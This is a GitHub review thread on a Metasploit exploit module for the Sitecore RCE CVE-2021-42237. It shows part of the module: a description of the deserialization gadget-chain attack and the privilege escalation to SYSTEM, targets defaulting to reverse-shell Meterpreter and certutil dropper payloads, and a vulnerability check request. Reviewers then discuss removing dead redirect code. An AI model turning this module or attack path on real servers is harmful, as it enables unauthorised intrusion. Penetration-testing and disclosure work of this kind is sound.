modules/exploits/windows/http/cve_2021_42237.rb

```diff
@@ -0,0 +1,216 @@
+          the attacker's request.
+
+          Then for each subelement named "parameter", the code will check that it has a name and
+          if it does, it will call NetDataContractSerializer().ReadObject on it. NetDataContractSerializer is
+          vulnerable to deserialization attacks and can be trivially exploited by using the
+          TypeConfuseDelegate gadget chain.
+
+          By exploiting this vulnerability, an attacker can gain arbitrary code execution as the user
+          that IIS is running as, aka NT AUTHORITY\NETWORK SERVICE. Users can then use technique 4
+          of the "getsystem" command to use RPCSS impersonation and get SYSTEM level code execution.
+        },
+        'Author' => [
+          'AssetNote', # Discovery and exploit
+          'gwillcox-r7' # Module
+        ],
+        'References' => [
+          ['CVE', '2021-42237'],
+          ['URL', 'https://blog.assetnote.io/2021/11/02/sitecore-rce/'],
+          ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776'],
+        ],
+        'DisclosureDate' => '2021-11-02',
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_bind_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'CmdStagerFlavor' => :certutil,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'PowerShell Stager',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :psh_stager,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 2,
+        'DefaultOptions' => {
+          'WfsDelay' => 30 # It can take a few seconds for reverse shells to trigger. Bind shells should be pretty quick.
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path of Sitecore', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'sitecore', 'shell', 'ClientBin', 'Reporting', 'Report.ashx'),
+      'redirect_depth' => 0
```

Comment:
Does this do anything?

Reply:
This is testament to my massive confusion over how redirects work with various methods in Metasploit. Please leave as is :trollface:. 

In all seriousness, this looks like it was left over from when I thought `send_request_cgi` would follow redirects in attempt to get it to not follow redirects.

Reply:
Yeah, I'd remove the dead code. :)

Reply:
Removed dead code in https://github.com/rapid7/metasploit-framework/pull/15858/commits/be4fa90f1aab0ef38ab1ca21cd02754be6940a5c